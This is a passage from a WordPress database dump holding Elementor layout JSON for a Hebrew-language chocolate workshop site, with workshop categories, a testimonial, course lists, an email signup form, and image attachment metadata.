lassic\",\"background_color\":\"#ffffff\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"25\",\"bottom\":\"50\",\"left\":\"25\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"20\",\"bottom\":\"60\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[{\"id\":\"702ee38f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"24\",\"bottom\":\"0\",\"left\":\"24\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"screen_sm\":\"custom\",\"screen_sm_width\":\"50\"},\"elements\":[{\"id\":\"60600fc4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":32,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-couple.png\"},\"title_text\":\"\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"image_space\":{\"unit\":\"px\",\"size\":30},\"image_size\":{\"unit\":\"%\",\"size\":\"75\"},\"description_color\":\"#40272c\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":\"25\"},\"description_typography_font_family\":\"Damion\",\"description_typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"description_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"19\"},\"description_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"20\"},\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%96%D7%95%D7%92%D7%99%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"f9b0ce7\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"24\",\"bottom\":\"0\",\"left\":\"24\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"screen_sm\":\"custom\",\"screen_sm_width\":\"50\"},\"elements\":[{\"id\":\"6945b5b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":31,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-woman.png\"},\"title_text\":\"\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"image_space\":{\"unit\":\"px\",\"size\":30},\"image_size\":{\"unit\":\"%\",\"size\":\"75\"},\"description_color\":\"#40272c\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":\"25\"},\"description_typography_font_family\":\"Damion\",\"description_typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"description_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"19\"},\"description_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"20\"},\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%9E%D7%A1%D7%99%D7%91%D7%AA-%D7%A8%D7%95%D7%95%D7%A7%D7%95%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"fa7a00f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"24\",\"bottom\":\"0\",\"left\":\"24\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"screen_sm\":\"custom\",\"screen_sm_width\":\"50\"},\"elements\":[{\"id\":\"afa7d0f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":28,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-company.png\"},\"title_text\":\"\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea\",\"image_space\":{\"unit\":\"px\",\"size\":30},\"image_size\":{\"unit\":\"%\",\"size\":\"75\"},\"description_color\":\"#40272c\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":\"25\"},\"description_typography_font_family\":\"Damion\",\"description_typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"description_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"19\"},\"description_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"20\"},\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%97%D7%91%D7%A8%D7%95%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"4a4b992\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"24\",\"bottom\":\"0\",\"left\":\"24\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"screen_sm\":\"custom\",\"screen_sm_width\":\"50\"},\"elements\":[{\"id\":\"c498248\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":30,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-kids.png\"},\"title_text\":\"\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"image_space\":{\"unit\":\"px\",\"size\":30},\"image_size\":{\"unit\":\"%\",\"size\":\"75\"},\"description_color\":\"#40272c\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":\"25\"},\"description_typography_font_family\":\"Damion\",\"description_typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"description_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"19\"},\"description_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"20\"}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5684ff50\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"id\":91,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/BG.jpg\"},\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#190606\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.75},\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"115\",\"bottom\":\"50\",\"left\":\"115\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"20\",\"bottom\":\"40\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[{\"id\":\"74663cd\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"125f3fc\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05de\\u05d4 \\u05d4\\u05e9\\u05d1\\u05e2\\u05d9\\u05dd \\u05d4\\u05de\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05e9\\u05dc\\u05e0\\u05d5 \\u05d0\\u05d5\\u05de\\u05e8\\u05d9\\u05dd\",\"align\":\"center\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":53},\"typography_font_weight\":\"400\",\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"43\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"40\"},\"typography_font_family\":\"Open Sans Hebrew\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6410b809\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":32,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-couple.png\"},\"_padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"5\",\"left\":\"0\",\"isLinked\":false},\"caption\":\"\\u05e0\\u05ea\\u05d9 \\u05d5\\u05d2\\u05d1\\u05e8\\u05d9\\u05d0\\u05dc\\u05d4 \\u05de\\u05e8\\u05d0\\u05e9\\u05d5\\u05df \\u05dc\\u05e6\\u05d9\\u05d5\\u05df\",\"text_color\":\"#cccccc\",\"caption_typography_typography\":\"custom\",\"caption_typography_font_size\":{\"unit\":\"px\",\"size\":13},\"caption_source\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6c4e5757\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\\"\\u05ea\\u05de\\u05d9\\u05d3 \\u05d0\\u05d4\\u05d1\\u05ea\\u05d9 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05d0\\u05e3 \\u05e4\\u05e2\\u05dd \\u05dc\\u05d0 \\u05d7\\u05e9\\u05d1\\u05ea\\u05d9 \\u05e9\\u05d0\\u05e0\\u05d9 \\u05d0\\u05ea\\u05e8\\u05d2\\u05e9 \\u05db\\u05dc \\u05db\\u05da \\u05de\\u05d9\\u05d5\\u05dd \\u05e9\\u05dc\\u05dd \\u05e9\\u05dc \\u05de\\u05ea\\u05d5\\u05e7. \\u05ea\\u05d5\\u05d3\\u05d4 \\u05e8\\u05d1\\u05d4 \\u05dc\\u05e6\\u05d5\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3 \\u05e9\\u05e2\\u05d6\\u05e8 \\u05dc\\u05d9 \\u05dc\\u05de\\u05e6\\u05d5\\u05d0 \\u05d0\\u05ea \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05de\\u05ea!\\\"\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":27},\"typography_font_weight\":\"400\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"17\",\"bottom\":\"0\",\"left\":\"17\",\"isLinked\":false},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"25\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"25\"},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"typography_font_style\":\"italic\",\"typography_font_family\":\"Open Sans Hebrew\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5c25e365\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u05d2\\u05dd \\u05d0\\u05e0\\u05d9 \\u05e8\\u05d5\\u05e6\\u05d4 \\u05dc\\u05d4\\u05d9\\u05e8\\u05e9\\u05dd \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4!\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26},\"typography_font_weight\":\"normal\",\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"3\"},\"button_text_color\":\"#40272c\",\"background_color\":\"#edd0a8\",\"border_width\":{\"unit\":\"px\",\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\",\"isLinked\":false},\"border_color\":\"#edd0a8\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"50\",\"bottom\":\"20\",\"left\":\"50\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"15\"},\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#5c0011\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A6%D7%A8%D7%95-%D7%A7%D7%A9%D7%A8\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"typography_font_family\":\"Open Sans Hebrew\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"43f8ef8f\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"background_background\":\"gradient\",\"background_color\":\"#575860\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"15\",\"bottom\":\"20\",\"left\":\"15\",\"isLinked\":false},\"background_color_b\":\"#3a3a3a\",\"background_gradient_angle\":{\"unit\":\"deg\",\"size\":360},\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"39181ab4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"10694622\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"5212b57b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"2b9dc682\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"50c468d5\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"icon\":\"\",\"_id\":\"7a91d3f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"ad388f0\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d5\\u05d0\\u05e8\\u05d2\\u05d5\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"9dc0267\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"45bcecca\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"37f8a4fc\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e7\\u05d5\\u05e8\\u05e1\\u05d9\\u05dd \\u05e2\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"285e10d7\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d8\\u05d9\\u05d9\\u05e8\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a70e4bf\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05ea\\u05d7\\u05d9\\u05dc\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"30a3b9f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"24484b98\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":49.999,\"_inline_size_tablet\":100,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true}},\"elements\":[{\"id\":\"33814887\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"48098d8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4 (\\u05dc\\u05dc\\u05d0 \\u05d4\\u05ea\\u05d7\\u05d9\\u05d9\\u05d1\\u05d5\\u05ea \\/ \\u05e1\\u05e4\\u05d0\\u05dd \\/ \\u05d0\\u05db\\u05d9\\u05dc\\u05d5\\u05ea \\u05e8\\u05d0\\u05e9 \\u05de\\u05d9\\u05d5\\u05ea\\u05e8\\u05d5\\u05ea)? \\u05d1\\u05e9\\u05de\\u05d7\\u05d4, \\u05d4\\u05e9\\u05d0\\u05d9\\u05e8\\u05d5 \\u05de\\u05d9\\u05d9\\u05dc \\u05d5\\u05e0\\u05e9\\u05dc\\u05d7 \\u05dc\\u05db\\u05dd \\u05de\\u05d9\\u05d9\\u05dc <span style=\\\"text-decoration: underline;\\\"><strong>\\u05d0\\u05da \\u05d5\\u05e8\\u05e7<\\/strong><\\/span> \\u05db\\u05e9\\u05d9\\u05d4\\u05d9\\u05d4 \\u05ea\\u05d0\\u05e8\\u05d9\\u05da \\u05d7\\u05d3\\u05e9 \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d4<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_font_weight\":\"300\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f32a997\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"Email\",\"placeholder\":\"\\u05de\\u05d4 \\u05d4\\u05de\\u05d9\\u05d9\\u05dc \\u05e9\\u05dc\\u05da?\",\"width\":\"66\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"}],\"show_labels\":\"\",\"button_text\":\"\\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4?\",\"button_width\":\"33\",\"email_content\":\"[all-fields]\",\"email_content_2\":\"[all-fields]\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\",\"column_gap\":{\"unit\":\"px\",\"size\":0},\"row_gap\":{\"unit\":\"px\",\"size\":0},\"label_color\":\"#ffffff\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"field_text_color\":\"#000000\",\"field_typography_typography\":\"custom\",\"field_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"field_typography_font_weight\":\"300\",\"field_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"field_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_color\":\"#edd0a8\",\"button_text_color\":\"#ffffff\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"button_typography_font_weight\":\"600\",\"button_typography_text_transform\":\"uppercase\",\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_hover_color\":\"#ed8a00\",\"button_hover_color\":\"#ffffff\",\"input_size\":\"md\",\"button_size\":\"md\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(537,122,'_elementor_version','0.4'),(538,123,'_edit_last','1'),(539,123,'_edit_lock','1596644721:1'),(541,123,'_wp_page_template','elementor_header_footer'),(543,123,'_elementor_edit_mode','builder'),(545,125,'_wp_attached_file','2018/05/kids-choclate.jpg'),(546,125,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1200;s:6:\"height\";i:630;s:4:\"file\";s:25:\"2018/05/kids-choclate.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"kids-choclate-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"kids-choclate-300x158.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:158;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:25:\"kids-choclate-768x403.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:403;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:26:\"kids-choclate-1024x538.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:538;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:32:\"twentyseventeen-thumbnail-avatar\";a:4:{s:4:\"file\"